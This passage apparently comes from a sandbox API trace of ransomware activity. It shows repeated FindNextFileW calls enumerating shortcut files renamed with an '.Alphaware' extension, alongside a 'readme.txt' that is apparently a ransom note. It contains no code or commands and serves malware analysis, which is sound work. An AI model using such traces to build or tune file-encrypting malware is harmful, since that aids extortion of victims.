lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcf7665c0, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xcf7665c0, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8c969ae0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x3e0, dwReserved0=0x0, dwReserved1=0x0, cFileName="oa aQQjrX6y_jTlap6.lnk.Alphaware", cAlternateFileName="OAAQQJ~1.ALP")) returned 1 [0099.802] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd1149500, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd1149500, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8c9dbf00, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x4f4, dwReserved0=0x0, dwReserved1=0x0, cFileName="OnrpsaEkvylzPJqZCM2l.mkv.lnk.Alphaware", cAlternateFileName="ONRPSA~1.ALP")) returned 1 [0099.802] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd06df4c0, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd06df4c0, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8ca281c0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x1934, dwReserved0=0x0, dwReserved1=0x0, cFileName="oOpoFnm9s.lnk.Alphaware", cAlternateFileName="OOPOFN~1.ALP")) returned 1 [0099.802] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd0cd2bc0, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd0cd2bc0, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8ca74480, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0xdf4, dwReserved0=0x0, dwReserved1=0x0, cFileName="ozdQhhdYCAhwn.lnk.Alphaware", cAlternateFileName="OZDQHH~1.ALP")) returned 1 [0099.802] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcfc291c0, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xcfc291c0, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8cac0740, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0xda0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PPCDrQ5.lnk.Alphaware", cAlternateFileName="PPCDRQ~1.ALP")) returned 1 [0099.802] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcf3ae360, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xcf3ae360, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8cb0ca00, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x5f4, dwReserved0=0x0, dwReserved1=0x0, cFileName="PpTfQfUJeEHeOaQm.lnk.Alphaware", cAlternateFileName="PPTFQF~1.ALP")) returned 1 [0099.802] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcfcc1740, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xcfcc1740, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8cb7ee20, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x3a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PYDVqXrN.mkv.lnk.Alphaware", cAlternateFileName="PYDVQX~1.ALP")) returned 1 [0099.802] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd1599ce0, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd1599ce0, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8cbf1240, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0xe60, dwReserved0=0x0, dwReserved1=0x0, cFileName="qQ69AqvCd-_gGmFEhfCj.pdf.lnk.Alphaware", cAlternateFileName="QQ69AQ~1.ALP")) returned 1 [0099.802] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd13aab00, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd13aab00, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8cc3d500, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x4e0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Qs1EsaM6mnJQuW3k.lnk.Alphaware", cAlternateFileName="QS1ESA~1.ALP")) returned 1 [0099.802] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd0a97720, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd0a97720, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8cc897c0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0xe48, dwReserved0=0x0, dwReserved1=0x0, cFileName="q_m8XgrWlwVpa_ok Jpb.lnk.Alphaware", cAlternateFileName="Q_M8XG~1.ALP")) returned 1 [0099.803] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd1599ce0, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd1599ce0, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8ccaf920, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x2274, dwReserved0=0x0, dwReserved1=0x0, cFileName="r5bauI Uaurz 0kBPe.lnk.Alphaware", cAlternateFileName="R5BAUI~1.ALP")) returned 1 [0099.803] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xce6bcbc0, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd1762d60, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8ccfbbe0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0xd34, dwReserved0=0x0, dwReserved1=0x0, cFileName="RBnxFLdoe6j5FMDq.lnk.Alphaware", cAlternateFileName="RBNXFL~1.ALP")) returned 1 [0099.803] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8a8629a0, ftCreationTime.dwHighDateTime=0x1d9897a, ftLastAccessTime.dwLowDateTime=0x8a8629a0, ftLastAccessTime.dwHighDateTime=0x1d9897a, ftLastWriteTime.dwLowDateTime=0x8a8629a0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x49d, dwReserved0=0x0, dwReserved1=0x0, cFileName="readme.txt", cAlternateFileName="")) returned 1 [0099.803] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcfd0da00, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xcfd0da00, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8cd6e000, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0xe08, dwReserved0=0x0, dwReserved1=0x0, cFileName="RkF0hT0Xfp-m3q.lnk.Alphaware", cAlternateFileName="RKF0HT~1.ALP")) returned 1 [0099.803] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd12a0160, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd12a0160, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8cdba2c0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x5c8, dwReserved0=0x0, dwReserved1=0x0, cFileName="rKqcydSq.mkv.lnk.Alphaware", cAlternateFileName="RKQCYD~1.ALP")) returned 1 [0099.803] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd0007580, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd0007580, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8cde0420, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x3e0, dwReserved0=0x0, dwReserved1=0x0, cFileName="rmPQA vuvasucn14.mkv.lnk.Alphaware", cAlternateFileName="RMPQAV~1.ALP")) returned 1 [0099.803] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xce8d1f00, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd16a4680, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8ce2c6e0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x4b4, dwReserved0=0x0, dwReserved1=0x0, cFileName="Roaming.lnk.Alphaware", cAlternateFileName="ROAMIN~1.ALP")) returned 1 [0099.803] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcfd33b60, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xcfd33b60, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8ce789a0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x3e0, dwReserved0=0x0, dwReserved1=0x0, cFileName="s4xZHJNmFEW_-to_l.lnk.Alphaware", cAlternateFileName="S4XZHJ~1.ALP")) returned 1 [0099.803] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd13849a0, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd13849a0, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8cec4c60, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x5f4, dwReserved0=0x0, dwReserved1=0x0, cFileName="s8ZDF Lucr_Z28Spu.swf.lnk.Alphaware", cAlternateFileName="S8ZDFL~1.ALP")) returned 1 [0099.803] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcee531e0, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd14b54a0, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8cf10f20, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0xcc8, dwReserved0=0x0, dwReserved1=0x0, cFileName="sD_Mf.lnk.Alphaware", cAlternateFileName="SD_MFL~1.ALP")) returned 1 [0099.803] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd0d1ee80, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd0d1ee80, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8cf5d1e0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x4c8, dwReserved0=0x0, dwReserved1=0x0, cFileName="SjIEHWNzBPbEPK.lnk.Alphaware", cAlternateFileName="SJIEHW~1.ALP")) returned 1 [0099.803] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcffe1420, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xcffe1420, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8cfa94a0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x5c8, dwReserved0=0x0, dwReserved1=0x0, cFileName="t2oMmxPi.flv.lnk.Alphaware", cAlternateFileName="T2OMMX~1.ALP")) returned 1 [0099.803] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd08f4800, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd08f4800, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8cff5760, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x1ab4, dwReserved0=0x0, dwReserved1=0x0, cFileName="t2V3IQcrptDn.lnk.Alphaware", cAlternateFileName="T2V3IQ~1.ALP")) returned 1 [0099.803] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd14691e0, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd14691e0, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8d041a20, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x1b20, dwReserved0=0x0, dwReserved1=0x0, cFileName="T6C4G_g_0sfV1dVJsM.lnk.Alphaware", cAlternateFileName="T6C4G_~1.ALP")) returned 1 [0099.804] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcfce78a0, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xcfce78a0, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8d08dce0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x5a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="te-nH.flv.lnk.Alphaware", cAlternateFileName="TE-NHF~1.ALP")) returned 1 [0099.804] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd03e5940, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd03e5940, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8d0d9fa0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x1334, dwReserved0=0x0, dwReserved1=0x0, cFileName="TKqjZN.flv.lnk.Alphaware", cAlternateFileName="TKQJZN~1.ALP")) returned 1 [0099.804] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcffbb2c0, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xcffbb2c0, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8d126260, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x13c8, dwReserved0=0x0, dwReserved1=0x0, cFileName="TVHtwFsg.flv.lnk.Alphaware", cAlternateFileName="TVHTWF~1.ALP")) returned 1 [0099.804] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcf4468e0, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xcf4468e0, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8d172520, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0xe08, dwReserved0=0x0, dwReserved1=0x0, cFileName="U6t2jBTAet1hJh.lnk.Alphaware", cAlternateFileName="U6T2JB~1.ALP")) returned 1 [0099.804] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd0a715c0, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd0a715c0, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8d1be7e0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0xe34, dwReserved0=0x0, dwReserved1=0x0, cFileName="UgJB0bK8M6Fbzeqf.lnk.Alphaware", cAlternateFileName="UGJB0B~1.ALP")) returned 1 [0099.804] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcec3dea0, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd15bfe40, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8d20aaa0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x374, dwReserved0=0x0, dwReserved1=0x0, cFileName="UKlsVP0OeoLUyu0aA.lnk.Alphaware", cAlternateFileName="UKLSVP~1.ALP")) returned 1 [0099.804] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd0cf8d20, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd0cf8d20, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8d256d60, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x21f4, dwReserved0=0x0, dwReserved1=0x0, cFileName="uPx6uzdIPR.lnk.Alphaware", cAlternateFileName="UPX6UZ~1.ALP")) returned 1 [0099.804] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd12c62c0, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd12c62c0, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8d2a3020, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x19f4, dwReserved0=0x0, dwReserved1=0x0, cFileName="V8U50BNOH.lnk.Alphaware", cAlternateFileName="V8U50B~1.ALP")) returned 1 [0099.804] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcef5db80, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xcef5db80, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8d2ef2e0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x608, dwReserved0=0x0, dwReserved1=0x0, cFileName="vCNVmrhf2U7XXJBaxRmB.lnk.Alphaware", cAlternateFileName="VCNVMR~1.ALP")) returned 1 [0099.804] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcf9edd20, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xcfb6aae0, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8d33b5a0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x2008, dwReserved0=0x0, dwReserved1=0x0, cFileName="vmOQizT54.lnk.Alphaware", cAlternateFileName="VMOQIZ~1.ALP")) returned 1 [0099.804] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd13d0c60, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd13d0c60, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8d387860, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x1534, dwReserved0=0x0, dwReserved1=0x0, cFileName="Vo9MO3eEU2 SLpQJWfM.lnk.Alphaware", cAlternateFileName="VO9MO3~1.ALP")) returned 1 [0099.804] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcfb6aae0, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xcfb6aae0, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8d3d3b20, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x28f4, dwReserved0=0x0, dwReserved1=0x0, cFileName="vwNeKxlo1w35_GTiy.lnk.Alphaware", cAlternateFileName="VWNEKX~1.ALP")) returned 1 [0099.804] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd15278c0, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd15278c0, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8d41fde0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x3b4, dwReserved0=0x0, dwReserved1=0x0, cFileName="Vxbet57tOqM.lnk.Alphaware", cAlternateFileName="VXBET5~1.ALP")) returned 1 [0099.804] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcf870f60, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd0d6b140, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8d46c0a0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0xd88, dwReserved0=0x0, dwReserved1=0x0, cFileName="w0y6K3cxjraf-y2uE6.lnk.Alphaware", cAlternateFileName="W0Y6K3~1.ALP")) returned 1 [0099.805] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd002d6e0, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd002d6e0, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8d492200, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x608, dwReserved0=0x0, dwReserved1=0x0, cFileName="w1qxUxlTv5acD7ekU7.mkv.lnk.Alphaware", cAlternateFileName="W1QXUX~1.ALP")) returned 1 [0099.805] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcfc75480, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xcfc75480, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8d4de4c0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0xde0, dwReserved0=0x0, dwReserved1=0x0, cFileName="wO--2PwPxtF.lnk.Alphaware", cAlternateFileName="WO--2P~1.ALP")) returned 1 [0099.805] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd10b0f80, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd10b0f80, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8d5c2d00, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x3e0, dwReserved0=0x0, dwReserved1=0x0, cFileName="WQTdEEFonuZ7KxbDBX.lnk.Alphaware", cAlternateFileName="WQTDEE~1.ALP")) returned 1 [0099.805] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd0a4b460, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd0a4b460, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8d60efc0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x21a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="WsNjcAtuTT8n1nv.lnk.Alphaware", cAlternateFileName="WSNJCA~1.ALP")) returned 1 [0099.805] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd00799a0, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd00799a0, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8d6a7540, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x1b20, dwReserved0=0x0, dwReserved1=0x0, cFileName="xexTT Q3v7p50maSoJ5.lnk.Alphaware", cAlternateFileName="XEXTTQ~1.ALP")) returned 1 [0099.805] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcf870f60, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xcf870f60, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8d6f3800, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x3b4, dwReserved0=0x0, dwReserved1=0x0, 